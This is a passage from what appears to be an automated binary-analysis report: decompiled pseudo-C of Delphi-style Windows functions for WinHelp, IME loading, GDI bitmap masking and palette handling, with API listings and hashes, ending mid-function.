                                                                        • Opcode Fuzzy Hash: 3bac1d995916bae630dc8399e42a92fe996f45957db1b53e04f404f2ee8b6375
                                                                        • Instruction Fuzzy Hash: AE01A2717081289AD700FB50AC81DEB775DEB11358B848137F815A3242D73CA90187AE
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 58%
                                                                        			E00430D08(void* __eax, void* __ebx, void* __edi, void* __esi) {
                                                                        				char _v8;
                                                                        				CHAR* _t20;
                                                                        				long _t25;
                                                                        				intOrPtr _t30;
                                                                        				void* _t34;
                                                                        				intOrPtr _t37;
                                                                        
                                                                        				_push(0);
                                                                        				_t34 = __eax;
                                                                        				_push(_t37);
                                                                        				_push(0x430d85);
                                                                        				_push( *[fs:eax]);
                                                                        				 *[fs:eax] = _t37;
                                                                        				E00430754(__eax);
                                                                        				_t25 = GetTickCount();
                                                                        				do {
                                                                        					Sleep(0);
                                                                        				} while (GetTickCount() - _t25 <= 0x3e8);
                                                                        				E004303AC(_t34, _t25,  &_v8, 0, __edi, _t34);
                                                                        				if(_v8 != 0) {
                                                                        					_t20 = E004047F8(_v8);
                                                                        					WinHelpA( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t34 + 0x1c)))) + 0xc))(), _t20, 9, 0);
                                                                        				}
                                                                        				_pop(_t30);
                                                                        				 *[fs:eax] = _t30;
                                                                        				_push(0x430d8c);
                                                                        				return E00404348( &_v8);
                                                                        			}










                                                                        APIs
                                                                          • Part of subcall function 00430754: WinHelpA.USER32 ref: 00430763
                                                                        • GetTickCount.KERNEL32 ref: 00430D26
                                                                        • Sleep.KERNEL32(00000000,00000000,00430D85,?,?,00000000,00000000,?,00430CFB), ref: 00430D2F
                                                                        • GetTickCount.KERNEL32 ref: 00430D34
                                                                        • WinHelpA.USER32 ref: 00430D6A
                                                                        Similarity
                                                                        • API ID: CountHelpTick$Sleep
                                                                        • String ID:
                                                                        • API String ID: 2438605093-0
                                                                        • Opcode ID: b159ed8da29f14084cdfe4b7c42b37775e2f4efdee277ec71451ef76ad6eb451
                                                                        • Instruction ID: 728367182c2a4c0d1575522e4c38db70398e5defa9278ae5990baf4831071f11
                                                                        • Opcode Fuzzy Hash: b159ed8da29f14084cdfe4b7c42b37775e2f4efdee277ec71451ef76ad6eb451
                                                                        • Instruction Fuzzy Hash: D701A270700204AFE711FBA6CC52B5DB2E8DB4C704F52567BF500A75C1DA79AE009969
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 91%
                                                                        			E0043A6DC(void* __eax, intOrPtr* __edx) {
                                                                        				char _v20;
                                                                        				char _v28;
                                                                        				void* __edi;
                                                                        				intOrPtr _t17;
                                                                        				void* _t19;
                                                                        				void* _t21;
                                                                        				void* _t32;
                                                                        				void* _t39;
                                                                        				void* _t45;
                                                                        				intOrPtr _t47;
                                                                        				intOrPtr _t48;
                                                                        				void* _t50;
                                                                        				void* _t51;
                                                                        				void* _t65;
                                                                        				intOrPtr* _t66;
                                                                        				intOrPtr* _t68;
                                                                        				void* _t69;
                                                                        
                                                                        				_t68 = __edx;
                                                                        				_t50 = __eax;
                                                                        				_t17 =  *__edx;
                                                                        				_t69 = _t17 - 0x84;
                                                                        				if(_t69 > 0) {
                                                                        					_t19 = _t17 + 0xffffff00 - 9;
                                                                        					if(_t19 < 0) {
                                                                        						_t21 = E00436D1C(__eax);
                                                                        						if(_t21 != 0) {
                                                                        							L28:
                                                                        							return _t21;
                                                                        						}
                                                                        						L27:
                                                                        						return E0043782C(_t50, _t68);
                                                                        					}
                                                                        					if(_t19 + 0xffffff09 - 0xb < 0) {
                                                                        						_t21 = E0043A648(__eax, _t51, __edx);
                                                                        						if(_t21 == 0) {
                                                                        							goto L27;
                                                                        						}
                                                                        						if( *((intOrPtr*)(_t68 + 0xc)) != 0) {
                                                                        							goto L28;
                                                                        						}
                                                                        						_t21 = E0043CF30(_t50);
                                                                        						if(_t21 == 0) {
                                                                        							goto L28;
                                                                        						}
                                                                        						_push( *((intOrPtr*)(_t68 + 8)));
                                                                        						_push( *((intOrPtr*)(_t68 + 4)));
                                                                        						_push( *_t68);
                                                                        						_t32 = E0043CC2C(_t50);
                                                                        						_push(_t32);
                                                                        						L00406D8C();
                                                                        						return _t32;
                                                                        					}
                                                                        					goto L27;
                                                                        				}
                                                                        				if(_t69 == 0) {
                                                                        					_t21 = E0043782C(__eax, __edx);
                                                                        					if( *((intOrPtr*)(__edx + 0xc)) != 0xffffffff) {
                                                                        						goto L28;
                                                                        					}
                                                                        					E00407314( *((intOrPtr*)(__edx + 8)), _t51,  &_v20);
                                                                        					E004360F0(_t50,  &_v28,  &_v20);
                                                                        					_t21 = E0043A5B4(_t50, 0,  &_v28, _t65, 0);
                                                                        					if(_t21 == 0) {
                                                                        						goto L28;
                                                                        					}
                                                                        					 *((intOrPtr*)(_t68 + 0xc)) = 1;
                                                                        					return _t21;
                                                                        				}
                                                                        				_t39 = _t17 - 7;
                                                                        				if(_t39 == 0) {
                                                                        					_t66 = E0044DA34(__eax);
                                                                        					if(_t66 == 0) {
                                                                        						goto L27;
                                                                        					}
                                                                        					_t21 =  *((intOrPtr*)( *_t66 + 0xe4))();
                                                                        					if(_t21 == 0) {
                                                                        						goto L28;
                                                                        					}
                                                                        					goto L27;
                                                                        				}
                                                                        				_t21 = _t39 - 1;
                                                                        				if(_t21 == 0) {
                                                                        					if(( *(__eax + 0x54) & 0x00000020) != 0) {
                                                                        						goto L28;
                                                                        					}
                                                                        				} else {
                                                                        					if(_t21 == 0x17) {
                                                                        						_t45 = E0043CC2C(__eax);
                                                                        						if(_t45 == GetCapture() &&  *0x47a96c != 0) {
                                                                        							_t47 =  *0x47a96c; // 0x0
                                                                        							if(_t50 ==  *((intOrPtr*)(_t47 + 0x30))) {
                                                                        								_t48 =  *0x47a96c; // 0x0
                                                                        								E00437760(_t48, 0, 0x1f, 0);
                                                                        							}
                                                                        						}
                                                                        					}
                                                                        				}
                                                                        			}





















                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.749503743.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000002.00000002.749483060.0000000000400000.00000002.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749763098.000000000047A000.00000004.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749779338.000000000047B000.00000008.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749823728.0000000000495000.00000008.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749839062.0000000000496000.00000004.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749850256.000000000049C000.00000002.00020000.sdmp
                                                                        Similarity
                                                                        • API ID: Capture
                                                                        • String ID:
                                                                        • API String ID: 1145282425-3916222277
                                                                        • Opcode ID: c6b065f950aeea42138e2c2433ce8e98d842ebbd617e3b1284dea8e207de2a66
                                                                        • Instruction ID: 12ac0fe7456563294c718b5602fa9538c711e14ac05094fc64cad230b781499c
                                                                        • Opcode Fuzzy Hash: c6b065f950aeea42138e2c2433ce8e98d842ebbd617e3b1284dea8e207de2a66
                                                                        • Instruction Fuzzy Hash: C5318E707402005BC728BA39898566A22959B4D318F14B93FB4D6D7396DA3CCC66C78B
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 83%
                                                                        			E004414DC() {
                                                                        				int _v8;
                                                                        				intOrPtr _t4;
                                                                        				struct HINSTANCE__* _t11;
                                                                        				struct HINSTANCE__* _t13;
                                                                        				struct HINSTANCE__* _t15;
                                                                        				struct HINSTANCE__* _t17;
                                                                        				struct HINSTANCE__* _t19;
                                                                        				struct HINSTANCE__* _t21;
                                                                        				struct HINSTANCE__* _t23;
                                                                        				struct HINSTANCE__* _t25;
                                                                        				struct HINSTANCE__* _t27;
                                                                        				struct HINSTANCE__* _t29;
                                                                        				intOrPtr _t40;
                                                                        				intOrPtr _t42;
                                                                        				intOrPtr _t44;
                                                                        
                                                                        				_t42 = _t44;
                                                                        				_t4 =  *0x495c50; // 0x4967f0
                                                                        				if( *((char*)(_t4 + 0xc)) == 0) {
                                                                        					return _t4;
                                                                        				} else {
                                                                        					_v8 = SetErrorMode(0x8000);
                                                                        					_push(_t42);
                                                                        					_push(0x441642);
                                                                        					_push( *[fs:eax]);
                                                                        					 *[fs:eax] = _t44;
                                                                        					if( *0x496bc0 == 0) {
                                                                        						 *0x496bc0 = GetProcAddress(GetModuleHandleA("USER32"), "WINNLSEnableIME");
                                                                        					}
                                                                        					if( *0x47a9d8 == 0) {
                                                                        						 *0x47a9d8 = LoadLibraryA("IMM32.DLL");
                                                                        						if( *0x47a9d8 != 0) {
                                                                        							_t11 =  *0x47a9d8; // 0x0
                                                                        							 *0x496bc4 = GetProcAddress(_t11, "ImmGetContext");
                                                                        							_t13 =  *0x47a9d8; // 0x0
                                                                        							 *0x496bc8 = GetProcAddress(_t13, "ImmReleaseContext");
                                                                        							_t15 =  *0x47a9d8; // 0x0
                                                                        							 *0x496bcc = GetProcAddress(_t15, "ImmGetConversionStatus");
                                                                        							_t17 =  *0x47a9d8; // 0x0
                                                                        							 *0x496bd0 = GetProcAddress(_t17, "ImmSetConversionStatus");
                                                                        							_t19 =  *0x47a9d8; // 0x0
                                                                        							 *0x496bd4 = GetProcAddress(_t19, "ImmSetOpenStatus");
                                                                        							_t21 =  *0x47a9d8; // 0x0
                                                                        							 *0x496bd8 = GetProcAddress(_t21, "ImmSetCompositionWindow");
                                                                        							_t23 =  *0x47a9d8; // 0x0
                                                                        							 *0x496bdc = GetProcAddress(_t23, "ImmSetCompositionFontA");
                                                                        							_t25 =  *0x47a9d8; // 0x0
                                                                        							 *0x496be0 = GetProcAddress(_t25, "ImmGetCompositionStringA");
                                                                        							_t27 =  *0x47a9d8; // 0x0
                                                                        							 *0x496be4 = GetProcAddress(_t27, "ImmIsIME");
                                                                        							_t29 =  *0x47a9d8; // 0x0
                                                                        							 *0x496be8 = GetProcAddress(_t29, "ImmNotifyIME");
                                                                        						}
                                                                        					}
                                                                        					_pop(_t40);
                                                                        					 *[fs:eax] = _t40;
                                                                        					_push(0x441649);
                                                                        					return SetErrorMode(_v8);
                                                                        				}
                                                                        			}



















                                                                        APIs
                                                                        • SetErrorMode.KERNEL32(00008000), ref: 004414F5
                                                                        • GetModuleHandleA.KERNEL32(USER32,00000000,00441642,?,00008000), ref: 00441519
                                                                        • GetProcAddress.KERNEL32(00000000,WINNLSEnableIME), ref: 00441526
                                                                        • LoadLibraryA.KERNEL32(IMM32.DLL,00000000,00441642,?,00008000), ref: 00441542
                                                                        • GetProcAddress.KERNEL32(00000000,ImmGetContext), ref: 00441564
                                                                        • GetProcAddress.KERNEL32(00000000,ImmReleaseContext), ref: 00441579
                                                                        • GetProcAddress.KERNEL32(00000000,ImmGetConversionStatus), ref: 0044158E
                                                                        • GetProcAddress.KERNEL32(00000000,ImmSetConversionStatus), ref: 004415A3
                                                                        • GetProcAddress.KERNEL32(00000000,ImmSetOpenStatus), ref: 004415B8
                                                                        • GetProcAddress.KERNEL32(00000000,ImmSetCompositionWindow), ref: 004415CD
                                                                        • GetProcAddress.KERNEL32(00000000,ImmSetCompositionFontA), ref: 004415E2
                                                                        • GetProcAddress.KERNEL32(00000000,ImmGetCompositionStringA), ref: 004415F7
                                                                        • GetProcAddress.KERNEL32(00000000,ImmIsIME), ref: 0044160C
                                                                        • GetProcAddress.KERNEL32(00000000,ImmNotifyIME), ref: 00441621
                                                                        • SetErrorMode.KERNEL32(?,00441649,00008000), ref: 0044163C
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.749503743.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000002.00000002.749483060.0000000000400000.00000002.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749763098.000000000047A000.00000004.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749779338.000000000047B000.00000008.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749823728.0000000000495000.00000008.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749839062.0000000000496000.00000004.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749850256.000000000049C000.00000002.00020000.sdmp
                                                                        Similarity
                                                                        • API ID: AddressProc$ErrorMode$HandleLibraryLoadModule
                                                                        • String ID: IMM32.DLL$ImmGetCompositionStringA$ImmGetContext$ImmGetConversionStatus$ImmIsIME$ImmNotifyIME$ImmReleaseContext$ImmSetCompositionFontA$ImmSetCompositionWindow$ImmSetConversionStatus$ImmSetOpenStatus$USER32$WINNLSEnableIME
                                                                        • API String ID: 3397921170-3271328588
                                                                        • Opcode ID: 41a94cf38aa0804b9e477ae109e7c998ef35792528566ebdd79e8338eb352709
                                                                        • Instruction ID: 689e1dabb6478f76fac1ff0258cb51012081a979876a385ea78672b4cdf9856c
                                                                        • Opcode Fuzzy Hash: 41a94cf38aa0804b9e477ae109e7c998ef35792528566ebdd79e8338eb352709
                                                                        • Instruction Fuzzy Hash: B8318FF0641350AFE700EFA5EC56A297BA8E354305B13483BF109DB6B1E67D98E08B1C
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 77%
                                                                        			E00420CCC(struct HDC__* __eax, void* __ebx, int __ecx, int __edx, void* __edi, void* __esi, int _a4, int _a8, struct HDC__* _a12, int _a16, int _a20, int _a24, int _a28, struct HDC__* _a32, int _a36, int _a40) {
                                                                        				int _v8;
                                                                        				int _v12;
                                                                        				char _v13;
                                                                        				struct HDC__* _v20;
                                                                        				void* _v24;
                                                                        				void* _v28;
                                                                        				long _v32;
                                                                        				long _v36;
                                                                        				struct HPALETTE__* _v40;
                                                                        				intOrPtr* _t78;
                                                                        				struct HPALETTE__* _t89;
                                                                        				struct HPALETTE__* _t95;
                                                                        				int _t171;
                                                                        				intOrPtr _t178;
                                                                        				intOrPtr _t180;
                                                                        				struct HDC__* _t182;
                                                                        				int _t184;
                                                                        				void* _t186;
                                                                        				void* _t187;
                                                                        				intOrPtr _t188;
                                                                        
                                                                        				_t186 = _t187;
                                                                        				_t188 = _t187 + 0xffffffdc;
                                                                        				_v12 = __ecx;
                                                                        				_v8 = __edx;
                                                                        				_t182 = __eax;
                                                                        				_t184 = _a16;
                                                                        				_t171 = _a20;
                                                                        				_v13 = 1;
                                                                        				_t78 =  *0x495c48; // 0x47a0ac
                                                                        				if( *_t78 != 2 || _t171 != _a40 || _t184 != _a36) {
                                                                        					_v40 = 0;
                                                                        					_v20 = E00420B28(CreateCompatibleDC(0));
                                                                        					_push(_t186);
                                                                        					_push(0x420f4c);
                                                                        					_push( *[fs:eax]);
                                                                        					 *[fs:eax] = _t188;
                                                                        					_v24 = E00420B28(CreateCompatibleBitmap(_a32, _t171, _t184));
                                                                        					_v28 = SelectObject(_v20, _v24);
                                                                        					_t89 =  *0x496a28; // 0xb7080776
                                                                        					_v40 = SelectPalette(_a32, _t89, 0);
                                                                        					SelectPalette(_a32, _v40, 0);
                                                                        					if(_v40 == 0) {
                                                                        						_t95 =  *0x496a28; // 0xb7080776
                                                                        						_v40 = SelectPalette(_v20, _t95, 0xffffffff);
                                                                        					} else {
                                                                        						_v40 = SelectPalette(_v20, _v40, 0xffffffff);
                                                                        					}
                                                                        					RealizePalette(_v20);
                                                                        					StretchBlt(_v20, 0, 0, _t171, _t184, _a12, _a8, _a4, _t171, _t184, 0xcc0020);
                                                                        					StretchBlt(_v20, 0, 0, _t171, _t184, _a32, _a28, _a24, _t171, _t184, 0x440328);
                                                                        					_v32 = SetTextColor(_t182, 0);
                                                                        					_v36 = SetBkColor(_t182, 0xffffff);
                                                                        					StretchBlt(_t182, _v8, _v12, _a40, _a36, _a12, _a8, _a4, _t171, _t184, 0x8800c6);
                                                                        					StretchBlt(_t182, _v8, _v12, _a40, _a36, _v20, 0, 0, _t171, _t184, 0x660046);
                                                                        					SetTextColor(_t182, _v32);
                                                                        					SetBkColor(_t182, _v36);
                                                                        					if(_v28 != 0) {
                                                                        						SelectObject(_v20, _v28);
                                                                        					}
                                                                        					DeleteObject(_v24);
                                                                        					_pop(_t178);
                                                                        					 *[fs:eax] = _t178;
                                                                        					_push(E00420F53);
                                                                        					if(_v40 != 0) {
                                                                        						SelectPalette(_v20, _v40, 0);
                                                                        					}
                                                                        					return DeleteDC(_v20);
                                                                        				} else {
                                                                        					_v24 = E00420B28(CreateCompatibleBitmap(_a32, 1, 1));
                                                                        					_v24 = SelectObject(_a12, _v24);
                                                                        					_push(_t186);
                                                                        					_push(0x420d9f);
                                                                        					_push( *[fs:eax]);
                                                                        					 *[fs:eax] = _t188;
                                                                        					MaskBlt(_t182, _v8, _v12, _a40, _a36, _a32, _a28, _a24, _v24, _a8, _a4, E00407308(0xaa0029, 0xcc0020));
                                                                        					_pop(_t180);
                                                                        					 *[fs:eax] = _t180;
                                                                        					_push(E00420F53);
                                                                        					_v24 = SelectObject(_a12, _v24);
                                                                        					return DeleteObject(_v24);
                                                                        				}
                                                                        			}

                                                                        APIs
                                                                        • CreateCompatibleBitmap.GDI32(?,00000001,00000001), ref: 00420D0F
                                                                        • SelectObject.GDI32(?,?), ref: 00420D24
                                                                        • MaskBlt.GDI32(?,?,?,?,?,?,00000000,0042011F,?,?,?,00000000,00000000,00420D9F,?,?), ref: 00420D73
                                                                        • SelectObject.GDI32(?,?), ref: 00420D8D
                                                                        • DeleteObject.GDI32(?), ref: 00420D99
                                                                        • CreateCompatibleDC.GDI32(00000000), ref: 00420DAD
                                                                        • CreateCompatibleBitmap.GDI32(?,?,?), ref: 00420DCE
                                                                        • SelectObject.GDI32(?,?), ref: 00420DE3
                                                                        • SelectPalette.GDI32(?,B7080776,00000000), ref: 00420DF7
                                                                        • SelectPalette.GDI32(?,?,00000000), ref: 00420E09
                                                                        • SelectPalette.GDI32(?,00000000,000000FF), ref: 00420E1E
                                                                        • SelectPalette.GDI32(?,B7080776,000000FF), ref: 00420E34
                                                                        • RealizePalette.GDI32(?), ref: 00420E40
                                                                        • StretchBlt.GDI32(?,00000000,00000000,?,?,?,?,?,?,?,00CC0020), ref: 00420E62
                                                                        • StretchBlt.GDI32(?,00000000,00000000,?,?,00000000,00000000,0042011F,?,?,00440328), ref: 00420E84
                                                                        • SetTextColor.GDI32(?,00000000), ref: 00420E8C
                                                                        • SetBkColor.GDI32(?,00FFFFFF), ref: 00420E9A
                                                                        • StretchBlt.GDI32(?,?,?,?,?,?,?,?,?,?,008800C6), ref: 00420EC6
                                                                        • StretchBlt.GDI32(?,?,?,?,?,?,00000000,00000000,?,?,00660046), ref: 00420EEB
                                                                        • SetTextColor.GDI32(?,0042011F), ref: 00420EF5
                                                                        • SetBkColor.GDI32(?,00000000), ref: 00420EFF
                                                                        • SelectObject.GDI32(?,00000000), ref: 00420F12
                                                                        • DeleteObject.GDI32(?), ref: 00420F1B
                                                                        • SelectPalette.GDI32(?,00000000,00000000), ref: 00420F3D
                                                                        • DeleteDC.GDI32(?), ref: 00420F46
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.749503743.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000002.00000002.749483060.0000000000400000.00000002.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749763098.000000000047A000.00000004.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749779338.000000000047B000.00000008.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749823728.0000000000495000.00000008.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749839062.0000000000496000.00000004.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749850256.000000000049C000.00000002.00020000.sdmp
                                                                        Similarity
                                                                        • API ID: Select$ObjectPalette$ColorStretch$CompatibleCreateDelete$BitmapText$MaskRealize
                                                                        • String ID:
                                                                        • API String ID: 3976802218-0
                                                                        • Opcode ID: dc01e1ed2023787ed6e24c7143467bd4d3dcb23ac5b5962359c221aa4fe5371a
                                                                        • Instruction ID: 5ed571c653ffefc6f61770c509f2f379e260f00009d4f5806ec2ee285bbd0929
                                                                        • Opcode Fuzzy Hash: dc01e1ed2023787ed6e24c7143467bd4d3dcb23ac5b5962359c221aa4fe5371a
                                                                        • Instruction Fuzzy Hash: D781C3B1A04218AFDB50EFA9CD81EAF77ECEB0D314F114419F618F7281C639AD508B68
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 79%
                                                                        			E004240C0(void* __eax, long __ecx, struct HPALETTE__* __edx) {
                                                                        				struct HBITMAP__* _v8;
                                                                        				struct HDC__* _v12;
                                                                        				struct HDC__* _v16;
                                                                        				struct HDC__* _v20;
                                                                        				char _v21;
                                                                        				void* _v28;
                                                                        				void* _v32;
                                                                        				intOrPtr _v92;
                                                                        				intOrPtr _v96;
                                                                        				int _v108;
                                                                        				int _v112;
                                                                        				void _v116;
                                                                        				int _t68;
                                                                        				long _t82;
                                                                        				void* _t117;
                                                                        				intOrPtr _t126;
                                                                        				intOrPtr _t127;
                                                                        				long _t130;
                                                                        				struct HPALETTE__* _t133;
                                                                        				void* _t137;
                                                                        				void* _t139;
                                                                        				intOrPtr _t140;
                                                                        
                                                                        				_t137 = _t139;
                                                                        				_t140 = _t139 + 0xffffff90;
                                                                        				_t130 = __ecx;
                                                                        				_t133 = __edx;
                                                                        				_t117 = __eax;
                                                                        				_v8 = 0;
                                                                        				if(__eax == 0 || GetObjectA(__eax, 0x54,  &_v116) == 0) {
                                                                        					return _v8;
                                                                        				} else {
                                                                        					E004235B4(_t117);
                                                                        					_v12 = 0;
                                                                        					_v20 = 0;
                                                                        					_push(_t137);
                                                                        					_push(0x4242bb);
                                                                        					_push( *[fs:eax]);
                                                                        					 *[fs:eax] = _t140;
                                                                        					_v12 = E00420B28(GetDC(0));
                                                                        					_v20 = E00420B28(CreateCompatibleDC(_v12));
                                                                        					_v8 = CreateBitmap(_v112, _v108, 1, 1, 0);
                                                                        					if(_v8 == 0) {
                                                                        						L18:
                                                                        						_t68 = 0;
                                                                        						_pop(_t126);
                                                                        						 *[fs:eax] = _t126;
                                                                        						_push(0x4242c2);
                                                                        						if(_v20 != 0) {
                                                                        							_t68 = DeleteDC(_v20);
                                                                        						}
                                                                        						if(_v12 != 0) {
                                                                        							return ReleaseDC(0, _v12);
                                                                        						}
                                                                        						return _t68;
                                                                        					} else {
                                                                        						_v32 = SelectObject(_v20, _v8);
                                                                        						if(_t130 != 0x1fffffff) {
                                                                        							_v16 = E00420B28(CreateCompatibleDC(_v12));
                                                                        							_push(_t137);
                                                                        							_push(0x424273);
                                                                        							_push( *[fs:eax]);
                                                                        							 *[fs:eax] = _t140;
                                                                        							if(_v96 == 0) {
                                                                        								_v21 = 0;
                                                                        							} else {
                                                                        								_v21 = 1;
                                                                        								_v92 = 0;
                                                                        								_t117 = E004239F8(_t117, _t133, _t133, 0,  &_v116);
                                                                        							}
                                                                        							_v28 = SelectObject(_v16, _t117);
                                                                        							if(_t133 != 0) {
                                                                        								SelectPalette(_v16, _t133, 0);
                                                                        								RealizePalette(_v16);
                                                                        								SelectPalette(_v20, _t133, 0);
                                                                        								RealizePalette(_v20);
                                                                        							}
                                                                        							_t82 = SetBkColor(_v16, _t130);
                                                                        							BitBlt(_v20, 0, 0, _v112, _v108, _v16, 0, 0, 0xcc0020);
                                                                        							SetBkColor(_v16, _t82);
                                                                        							if(_v28 != 0) {
                                                                        								SelectObject(_v16, _v28);
                                                                        							}
                                                                        							if(_v21 != 0) {
                                                                        								DeleteObject(_t117);
                                                                        							}
                                                                        							_pop(_t127);
                                                                        							 *[fs:eax] = _t127;
                                                                        							_push(0x42427a);
                                                                        							return DeleteDC(_v16);
                                                                        						} else {
                                                                        							PatBlt(_v20, 0, 0, _v112, _v108, 0x42);
                                                                        							if(_v32 != 0) {
                                                                        								SelectObject(_v20, _v32);
                                                                        							}
                                                                        							goto L18;
                                                                        						}
                                                                        					}
                                                                        				}
                                                                        			}


























                                                                        APIs
                                                                        • GetObjectA.GDI32(00000000,00000054,?), ref: 004240E3
                                                                        • GetDC.USER32(00000000), ref: 00424111
                                                                        • CreateCompatibleDC.GDI32(?), ref: 00424122
                                                                        • CreateBitmap.GDI32(?,?,00000001,00000001,00000000), ref: 0042413D
                                                                        • SelectObject.GDI32(?,00000000), ref: 00424157
                                                                        • PatBlt.GDI32(?,00000000,00000000,?,?,00000042), ref: 00424179
                                                                        • CreateCompatibleDC.GDI32(?), ref: 00424187
                                                                        • SelectObject.GDI32(00000000,00000000), ref: 004241CF
                                                                        • SelectPalette.GDI32(00000000,?,00000000), ref: 004241E2
                                                                        • RealizePalette.GDI32(00000000), ref: 004241EB
                                                                        • SelectPalette.GDI32(?,?,00000000), ref: 004241F7
                                                                        • RealizePalette.GDI32(?), ref: 00424200
                                                                        • SetBkColor.GDI32(00000000,00000000), ref: 0042420A
                                                                        • BitBlt.GDI32(?,00000000,00000000,?,?,00000000,00000000,00000000,00CC0020), ref: 0042422E
                                                                        • SetBkColor.GDI32(00000000,00000000), ref: 00424238
                                                                        • SelectObject.GDI32(00000000,00000000), ref: 0042424B
                                                                        • DeleteObject.GDI32(00000000), ref: 00424257
                                                                        • DeleteDC.GDI32(00000000), ref: 0042426D
                                                                        • SelectObject.GDI32(?,00000000), ref: 00424288
                                                                        • DeleteDC.GDI32(00000000), ref: 004242A4
                                                                        • ReleaseDC.USER32 ref: 004242B5
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.749503743.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000002.00000002.749483060.0000000000400000.00000002.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749763098.000000000047A000.00000004.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749779338.000000000047B000.00000008.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749823728.0000000000495000.00000008.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749839062.0000000000496000.00000004.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749850256.000000000049C000.00000002.00020000.sdmp
                                                                        Similarity
                                                                        • API ID: ObjectSelect$Palette$CreateDelete$ColorCompatibleRealize$BitmapRelease
                                                                        • String ID:
                                                                        • API String ID: 332224125-0
                                                                        • Opcode ID: 6f5505679764149f8975d96c7f15921c777c432716e7e995d3116d72c8a38ef9
                                                                        • Instruction ID: b199b53a5d34a191db7efce3f80a8b69dcc7b03c55fcec5dd27acc42e0efb18e
                                                                        • Opcode Fuzzy Hash: 6f5505679764149f8975d96c7f15921c777c432716e7e995d3116d72c8a38ef9
                                                                        • Instruction Fuzzy Hash: AC514C71F04214ABDB10EBEADC45FAFB7FCEB48704F51486AB214F7281D67899408B68
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 79%
                                                                        			E00424EBC(intOrPtr __eax, void* __ebx, void* __ecx, intOrPtr* __edx, void* __edi, void* __esi, char* _a4) {
                                                                        				intOrPtr _v8;
                                                                        				intOrPtr* _v12;
                                                                        				struct HDC__* _v16;
                                                                        				struct HDC__* _v20;
                                                                        				void* _v24;
                                                                        				BITMAPINFOHEADER* _v28;
                                                                        				intOrPtr _v32;
                                                                        				intOrPtr _v36;
                                                                        				signed int _v37;
                                                                        				struct HBITMAP__* _v44;
                                                                        				void* _v48;
                                                                        				struct HPALETTE__* _v52;
                                                                        				struct HPALETTE__* _v56;
                                                                        				intOrPtr* _v60;
                                                                        				intOrPtr* _v64;
                                                                        				short _v66;
                                                                        				short _v68;
                                                                        				signed short _v70;
                                                                        				signed short _v72;
                                                                        				void* _v76;
                                                                        				intOrPtr _v172;
                                                                        				char _v174;
                                                                        				intOrPtr _t150;
                                                                        				signed int _t160;
                                                                        				intOrPtr _t164;
                                                                        				signed int _t193;
                                                                        				signed int _t218;
                                                                        				signed short _t224;
                                                                        				intOrPtr _t251;
                                                                        				intOrPtr* _t255;
                                                                        				intOrPtr _t261;
                                                                        				intOrPtr _t299;
                                                                        				intOrPtr _t300;
                                                                        				intOrPtr _t305;
                                                                        				signed int _t307;
                                                                        				signed int _t327;
                                                                        				void* _t329;
                                                                        				void* _t330;
                                                                        				signed int _t331;
                                                                        				void* _t332;
                                                                        				void* _t333;
                                                                        				void* _t334;
                                                                        				intOrPtr _t335;
                                                                        
                                                                        				_t326 = __edi;
                                                                        				_t333 = _t334;
                                                                        				_t335 = _t334 + 0xffffff54;
                                                                        				_t329 = __ecx;
                                                                        				_v12 = __edx;
                                                                        				_v8 = __eax;
                                                                        				_v52 = 0;
                                                                        				_v44 = 0;
                                                                        				_v60 = 0;
                                                                        				 *((intOrPtr*)( *_v12 + 8))(__edi, __esi, __ebx, _t332);
                                                                        				_v37 = _v36 == 0xc;
                                                                        				if(_v37 != 0) {
                                                                        					_v36 = 0x28;
                                                                        				}
                                                                        				_v28 = E00402754(_v36 + 0x40c);
                                                                        				_v64 = _v28;
                                                                        				_push(_t333);
                                                                        				_push(0x4253d9);
                                                                        				_push( *[fs:edx]);
                                                                        				 *[fs:edx] = _t335;
                                                                        				_push(_t333);
                                                                        				_push(0x4253ac);
                                                                        				_push( *[fs:edx]);
                                                                        				 *[fs:edx] = _t335;
                                                                        				if(_v37 == 0) {
                                                                        					 *((intOrPtr*)( *_v12 + 8))();
                                                                        					_t330 = _t329 - _v36;
                                                                        					_t150 =  *((intOrPtr*)(_v64 + 0x10));
                                                                        					if(_t150 != 3 && _t150 != 0) {
                                                                        						_v60 = E004035AC(1);
                                                                        						if(_a4 == 0) {
                                                                        							E00402EF0( &_v174, 0xe);
                                                                        							_v174 = 0x4d42;
                                                                        							_v172 = _v36 + _t330;
